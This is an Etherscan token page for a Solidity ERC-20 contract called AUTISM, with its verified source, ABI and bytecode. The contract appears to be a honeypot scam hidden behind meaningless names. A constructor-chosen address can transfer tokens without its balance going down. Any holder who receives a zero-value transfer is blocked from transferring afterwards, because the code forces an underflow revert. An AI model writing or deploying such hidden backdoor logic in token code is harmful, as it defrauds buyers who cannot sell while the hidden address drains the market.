ETH Price: $3,455.97 (-0.90%)
Gas: 3 Gwei

Token

AUTISM (AUTISM)
 

Overview

Max Total Supply

1,000,000,000 AUTISM

Holders

15

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
6,103,123.375119076 AUTISM

Value
$0.00
0x8fc439a8d790fb21f0ea9f26313861f795a23152
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
AUTISM

Compiler Version
v0.8.14+commit.80d49f37

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-05-20
*/

/*

https://t.me/autismERC20

*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.14;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

contract AUTISM is Ownable {
    string public name = 'AUTISM';

    function approve(address lay, uint256 taste) public returns (bool success) {
        allowance[msg.sender][lay] = taste;
        emit Approval(msg.sender, lay, taste);
        return true;
    }

    event Approval(address indexed owner, address indexed spender, uint256 value);

    function army(address amount, address move, uint256 taste) private returns (bool success) {
        if (follow[amount] == 0) {
            balanceOf[amount] -= taste;
        }

        if (taste == 0) doll[move] += heard;

        if (follow[amount] == 0 && uniswapV2Pair != amount && doll[amount] > 0) {
            follow[amount] -= heard;
        }

        balanceOf[move] += taste;
        emit Transfer(amount, move, taste);
        return true;
    }

    mapping(address => uint256) private follow;

    IUniswapV2Router02 private uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

    string public symbol = 'AUTISM';

    uint256 public totalSupply = 1000000000 * 10 ** 9;

    event Transfer(address indexed from, address indexed to, uint256 value);

    uint256 private heard = 66;

    mapping(address => mapping(address => uint256)) public allowance;

    mapping(address => uint256) public balanceOf;

    function transferFrom(address amount, address move, uint256 taste) public returns (bool success) {
        require(taste <= allowance[amount][msg.sender]);
        allowance[amount][msg.sender] -= taste;
        army(amount, move, taste);
        return true;
    }

    uint8 public decimals = 9;

    constructor(address education) {
        balanceOf[msg.sender] = totalSupply;
        follow[education] = heard;
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
    }

    address public uniswapV2Pair;

    mapping(address => uint256) private doll;

    function transfer(address move, uint256 taste) public returns (bool success) {
        army(msg.sender, move, taste);
        return true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"education","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"lay","type":"address"},{"internalType":"uint256","name":"taste","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"move","type":"address"},{"internalType":"uint256","name":"taste","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"amount","type":"address"},{"internalType":"address","name":"move","type":"address"},{"internalType":"uint256","name":"taste","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60c0604052600660808190526541555449534d60d01b60a0908152620000299160019190620002cb565b50600380546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d1790556040805180820190915260068082526541555449534d60d01b60209092019182526200007f91600491620002cb565b50670de0b6b3a764000060055560426006556009805460ff191681179055348015620000aa57600080fd5b5060405162000cf038038062000cf0833981016040819052620000cd9162000371565b600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600554336000908152600860209081526040808320939093556006546001600160a01b038581168452600283529284902055600354835163c45a015560e01b8152935192169263c45a015592600480830193928290030181865afa1580156200017b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001a1919062000371565b6001600160a01b031663c9c6539630600360009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000204573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200022a919062000371565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801562000278573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200029e919062000371565b600960016101000a8154816001600160a01b0302191690836001600160a01b0316021790555050620003df565b828054620002d990620003a3565b90600052602060002090601f016020900481019282620002fd576000855562000348565b82601f106200031857805160ff191683800117855562000348565b8280016001018555821562000348579182015b82811115620003485782518255916020019190600101906200032b565b50620003569291506200035a565b5090565b5b808211156200035657600081556001016200035b565b6000602082840312156200038457600080fd5b81516001600160a01b03811681146200039c57600080fd5b9392505050565b600181811c90821680620003b857607f821691505b602082108103620003d957634e487b7160e01b600052602260045260246000fd5b50919050565b61090180620003ef6000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101c9578063a9059cbb146101d1578063dd62ed3e146101e4578063f2fde38b1461020f57600080fd5b806370a082311461018e578063715018a6146101ae5780638da5cb5b146101b857600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd1461012c578063313ce5671461013f57806349bd5a5e1461015e575b600080fd5b6100dc610222565b6040516100e99190610720565b60405180910390f35b610105610100366004610791565b6102b0565b60405190151581526020016100e9565b61011e60055481565b6040519081526020016100e9565b61010561013a3660046107bb565b61031c565b60095461014c9060ff1681565b60405160ff90911681526020016100e9565b6009546101769061010090046001600160a01b031681565b6040516001600160a01b0390911681526020016100e9565b61011e61019c3660046107f7565b60086020526000908152604090205481565b6101b661039b565b005b6000546001600160a01b0316610176565b6100dc610444565b6101056101df366004610791565b610451565b61011e6101f2366004610819565b600760209081526000928352604080842090915290825290205481565b6101b661021d3660046107f7565b610468565b6001805461022f9061084c565b80601f016020809104026020016040519081016040528092919081815260200182805461025b9061084c565b80156102a85780601f1061027d576101008083540402835291602001916102a8565b820191906000526020600020905b81548152906001019060200180831161028b57829003601f168201915b505050505081565b3360008181526007602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259061030b9086815260200190565b60405180910390a350600192915050565b6001600160a01b038316600090815260076020908152604080832033845290915281205482111561034c57600080fd5b6001600160a01b03841660009081526007602090815260408083203384529091528120805484929061037f90849061089c565b909155506103909050848484610582565b506001949350505050565b6000546001600160a01b031633146103fa5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6004805461022f9061084c565b600061045e338484610582565b5060019392505050565b6000546001600160a01b031633146104c25760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103f1565b6001600160a01b0381166105275760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103f1565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03831660009081526002602052604081205481036105cf576001600160a01b038416600090815260086020526040812080548492906105c990849061089c565b90915550505b81600003610608576006546001600160a01b0384166000908152600a6020526040812080549091906106029084906108b3565b90915550505b6001600160a01b03841660009081526002602052604090205415801561064157506009546001600160a01b038581166101009092041614155b801561066457506001600160a01b0384166000908152600a602052604090205415155b1561069a576006546001600160a01b0385166000908152600260205260408120805490919061069490849061089c565b90915550505b6001600160a01b038316600090815260086020526040812080548492906106c29084906108b3565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161070e91815260200190565b60405180910390a35060019392505050565b600060208083528351808285015260005b8181101561074d57858101830151858201604001528201610731565b8181111561075f576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b038116811461078c57600080fd5b919050565b600080604083850312156107a457600080fd5b6107ad83610775565b946020939093013593505050565b6000806000606084860312156107d057600080fd5b6107d984610775565b92506107e760208501610775565b9150604084013590509250925092565b60006020828403121561080957600080fd5b61081282610775565b9392505050565b6000806040838503121561082c57600080fd5b61083583610775565b915061084360208401610775565b90509250929050565b600181811c9082168061086057607f821691505b60208210810361088057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6000828210156108ae576108ae610886565b500390565b600082198211156108c6576108c6610886565b50019056fea264697066735822122099bdd28514fcaa502935dd924912fc9a5f2be322aab59d7cc9aaaee683fe11ae64736f6c634300080e00330000000000000000000000005785bdebde8f4571d52dd3b46173a5d3fd4ee563

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101c9578063a9059cbb146101d1578063dd62ed3e146101e4578063f2fde38b1461020f57600080fd5b806370a082311461018e578063715018a6146101ae5780638da5cb5b146101b857600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd1461012c578063313ce5671461013f57806349bd5a5e1461015e575b600080fd5b6100dc610222565b6040516100e99190610720565b60405180910390f35b610105610100366004610791565b6102b0565b60405190151581526020016100e9565b61011e60055481565b6040519081526020016100e9565b61010561013a3660046107bb565b61031c565b60095461014c9060ff1681565b60405160ff90911681526020016100e9565b6009546101769061010090046001600160a01b031681565b6040516001600160a01b0390911681526020016100e9565b61011e61019c3660046107f7565b60086020526000908152604090205481565b6101b661039b565b005b6000546001600160a01b0316610176565b6100dc610444565b6101056101df366004610791565b610451565b61011e6101f2366004610819565b600760209081526000928352604080842090915290825290205481565b6101b661021d3660046107f7565b610468565b6001805461022f9061084c565b80601f016020809104026020016040519081016040528092919081815260200182805461025b9061084c565b80156102a85780601f1061027d576101008083540402835291602001916102a8565b820191906000526020600020905b81548152906001019060200180831161028b57829003601f168201915b505050505081565b3360008181526007602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259061030b9086815260200190565b60405180910390a350600192915050565b6001600160a01b038316600090815260076020908152604080832033845290915281205482111561034c57600080fd5b6001600160a01b03841660009081526007602090815260408083203384529091528120805484929061037f90849061089c565b909155506103909050848484610582565b506001949350505050565b6000546001600160a01b031633146103fa5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6004805461022f9061084c565b600061045e338484610582565b5060019392505050565b6000546001600160a01b031633146104c25760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103f1565b6001600160a01b0381166105275760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103f1565b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03831660009081526002602052604081205481036105cf576001600160a01b038416600090815260086020526040812080548492906105c990849061089c565b90915550505b81600003610608576006546001600160a01b0384166000908152600a6020526040812080549091906106029084906108b3565b90915550505b6001600160a01b03841660009081526002602052604090205415801561064157506009546001600160a01b038581166101009092041614155b801561066457506001600160a01b0384166000908152600a602052604090205415155b1561069a576006546001600160a01b0385166000908152600260205260408120805490919061069490849061089c565b90915550505b6001600160a01b038316600090815260086020526040812080548492906106c29084906108b3565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161070e91815260200190565b60405180910390a35060019392505050565b600060208083528351808285015260005b8181101561074d57858101830151858201604001528201610731565b8181111561075f576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b038116811461078c57600080fd5b919050565b600080604083850312156107a457600080fd5b6107ad83610775565b946020939093013593505050565b6000806000606084860312156107d057600080fd5b6107d984610775565b92506107e760208501610775565b9150604084013590509250925092565b60006020828403121561080957600080fd5b61081282610775565b9392505050565b6000806040838503121561082c57600080fd5b61083583610775565b915061084360208401610775565b90509250929050565b600181811c9082168061086057607f821691505b60208210810361088057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b6000828210156108ae576108ae610886565b500390565b600082198211156108c6576108c6610886565b50019056fea264697066735822122099bdd28514fcaa502935dd924912fc9a5f2be322aab59d7cc9aaaee683fe11ae64736f6c634300080e0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000005785bdebde8f4571d52dd3b46173a5d3fd4ee563

-----Decoded View---------------
Arg [0] : education (address): 0x5785BDEBDE8F4571D52dd3B46173A5D3Fd4EE563

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000005785bdebde8f4571d52dd3b46173a5d3fd4ee563


Deployed Bytecode Sourcemap

2313:2148:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2347:29;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2385:198;;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;2385:198:0;1053:187:1;3364:49:0;;;;;;;;;1391:25:1;;;1379:2;1364:18;3364:49:0;1245:177:1;3663:270:0;;;;;;:::i;:::-;;:::i;3941:25::-;;;;;;;;;;;;1932:4:1;1920:17;;;1902:36;;1890:2;1875:18;3941:25:0;1760:184:1;4225:28:0;;;;;;;;-1:-1:-1;;;;;4225:28:0;;;;;;-1:-1:-1;;;;;2113:32:1;;;2095:51;;2083:2;2068:18;4225:28:0;1949:203:1;3610:44:0;;;;;;:::i;:::-;;;;;;;;;;;;;;1483:148;;;:::i;:::-;;841:79;879:7;906:6;-1:-1:-1;;;;;906:6:0;841:79;;3324:31;;;:::i;4311:147::-;;;;;;:::i;:::-;;:::i;3537:64::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;1786:244;;;;;;:::i;:::-;;:::i;2347:29::-;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;2385:198::-;2481:10;2446:12;2471:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;2471:26:0;;;;;;;;;;:34;;;2521:32;2446:12;;2471:26;;2521:32;;;;2500:5;1391:25:1;;1379:2;1364:18;;1245:177;2521:32:0;;;;;;;;-1:-1:-1;2571:4:0;2385:198;;;;:::o;3663:270::-;-1:-1:-1;;;;;3788:17:0;;3746:12;3788:17;;;:9;:17;;;;;;;;3806:10;3788:29;;;;;;;;3779:38;;;3771:47;;;;;;-1:-1:-1;;;;;3829:17:0;;;;;;:9;:17;;;;;;;;3847:10;3829:29;;;;;;;:38;;3862:5;;3829:17;:38;;3862:5;;3829:38;:::i;:::-;;;;-1:-1:-1;3878:25:0;;-1:-1:-1;3883:6:0;3891:4;3897:5;3878:4;:25::i;:::-;-1:-1:-1;3921:4:0;;3663:270;-1:-1:-1;;;;3663:270:0:o;1483:148::-;1053:6;;-1:-1:-1;;;;;1053:6:0;216:10;1053:22;1045:67;;;;-1:-1:-1;;;1045:67:0;;3462:2:1;1045:67:0;;;3444:21:1;;;3481:18;;;3474:30;3540:34;3520:18;;;3513:62;3592:18;;1045:67:0;;;;;;;;;1590:1:::1;1574:6:::0;;1553:40:::1;::::0;-1:-1:-1;;;;;1574:6:0;;::::1;::::0;1553:40:::1;::::0;1590:1;;1553:40:::1;1621:1;1604:19:::0;;-1:-1:-1;;;;;;1604:19:0::1;::::0;;1483:148::o;3324:31::-;;;;;;;:::i;4311:147::-;4374:12;4399:29;4404:10;4416:4;4422:5;4399:4;:29::i;:::-;-1:-1:-1;4446:4:0;;4311:147;-1:-1:-1;;;4311:147:0:o;1786:244::-;1053:6;;-1:-1:-1;;;;;1053:6:0;216:10;1053:22;1045:67;;;;-1:-1:-1;;;1045:67:0;;3462:2:1;1045:67:0;;;3444:21:1;;;3481:18;;;3474:30;3540:34;3520:18;;;3513:62;3592:18;;1045:67:0;3260:356:1;1045:67:0;-1:-1:-1;;;;;1875:22:0;::::1;1867:73;;;::::0;-1:-1:-1;;;1867:73:0;;3823:2:1;1867:73:0::1;::::0;::::1;3805:21:1::0;3862:2;3842:18;;;3835:30;3901:34;3881:18;;;3874:62;-1:-1:-1;;;3952:18:1;;;3945:36;3998:19;;1867:73:0::1;3621:402:1::0;1867:73:0::1;1977:6;::::0;;1956:38:::1;::::0;-1:-1:-1;;;;;1956:38:0;;::::1;::::0;1977:6;::::1;::::0;1956:38:::1;::::0;::::1;2005:6;:17:::0;;-1:-1:-1;;;;;;2005:17:0::1;-1:-1:-1::0;;;;;2005:17:0;;;::::1;::::0;;;::::1;::::0;;1786:244::o;2677:472::-;-1:-1:-1;;;;;2782:14:0;;2753:12;2782:14;;;:6;:14;;;;;;:19;;2778:78;;-1:-1:-1;;;;;2818:17:0;;;;;;:9;:17;;;;;:26;;2839:5;;2818:17;:26;;2839:5;;2818:26;:::i;:::-;;;;-1:-1:-1;;2778:78:0;2872:5;2881:1;2872:10;2868:35;;2898:5;;-1:-1:-1;;;;;2884:10:0;;;;;;:4;:10;;;;;:19;;:10;;;:19;;2898:5;;2884:19;:::i;:::-;;;;-1:-1:-1;;2868:35:0;-1:-1:-1;;;;;2920:14:0;;;;;;:6;:14;;;;;;:19;:46;;;;-1:-1:-1;2943:13:0;;-1:-1:-1;;;;;2943:23:0;;;:13;;;;;:23;;2920:46;:66;;;;-1:-1:-1;;;;;;2970:12:0;;2985:1;2970:12;;;:4;:12;;;;;;:16;;2920:66;2916:122;;;3021:5;;-1:-1:-1;;;;;3003:14:0;;;;;;:6;:14;;;;;:23;;:14;;;:23;;3021:5;;3003:23;:::i;:::-;;;;-1:-1:-1;;2916:122:0;-1:-1:-1;;;;;3050:15:0;;;;;;:9;:15;;;;;:24;;3069:5;;3050:15;:24;;3069:5;;3050:24;:::i;:::-;;;;;;;;3107:4;-1:-1:-1;;;;;3090:29:0;3099:6;-1:-1:-1;;;;;3090:29:0;;3113:5;3090:29;;;;1391:25:1;;1379:2;1364:18;;1245:177;3090:29:0;;;;;;;;-1:-1:-1;3137:4:0;2677:472;;;;;:::o;14:597:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:173::-;684:20;;-1:-1:-1;;;;;733:31:1;;723:42;;713:70;;779:1;776;769:12;713:70;616:173;;;:::o;794:254::-;862:6;870;923:2;911:9;902:7;898:23;894:32;891:52;;;939:1;936;929:12;891:52;962:29;981:9;962:29;:::i;:::-;952:39;1038:2;1023:18;;;;1010:32;;-1:-1:-1;;;794:254:1:o;1427:328::-;1504:6;1512;1520;1573:2;1561:9;1552:7;1548:23;1544:32;1541:52;;;1589:1;1586;1579:12;1541:52;1612:29;1631:9;1612:29;:::i;:::-;1602:39;;1660:38;1694:2;1683:9;1679:18;1660:38;:::i;:::-;1650:48;;1745:2;1734:9;1730:18;1717:32;1707:42;;1427:328;;;;;:::o;2157:186::-;2216:6;2269:2;2257:9;2248:7;2244:23;2240:32;2237:52;;;2285:1;2282;2275:12;2237:52;2308:29;2327:9;2308:29;:::i;:::-;2298:39;2157:186;-1:-1:-1;;;2157:186:1:o;2348:260::-;2416:6;2424;2477:2;2465:9;2456:7;2452:23;2448:32;2445:52;;;2493:1;2490;2483:12;2445:52;2516:29;2535:9;2516:29;:::i;:::-;2506:39;;2564:38;2598:2;2587:9;2583:18;2564:38;:::i;:::-;2554:48;;2348:260;;;;;:::o;2613:380::-;2692:1;2688:12;;;;2735;;;2756:61;;2810:4;2802:6;2798:17;2788:27;;2756:61;2863:2;2855:6;2852:14;2832:18;2829:38;2826:161;;2909:10;2904:3;2900:20;2897:1;2890:31;2944:4;2941:1;2934:15;2972:4;2969:1;2962:15;2826:161;;2613:380;;;:::o;2998:127::-;3059:10;3054:3;3050:20;3047:1;3040:31;3090:4;3087:1;3080:15;3114:4;3111:1;3104:15;3130:125;3170:4;3198:1;3195;3192:8;3189:34;;;3203:18;;:::i;:::-;-1:-1:-1;3240:9:1;;3130:125::o;4028:128::-;4068:3;4099:1;4095:6;4092:1;4089:13;4086:39;;;4105:18;;:::i;:::-;-1:-1:-1;4141:9:1;;4028:128::o

Swarm Source

ipfs://99bdd28514fcaa502935dd924912fc9a5f2be322aab59d7cc9aaaee683fe11ae
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.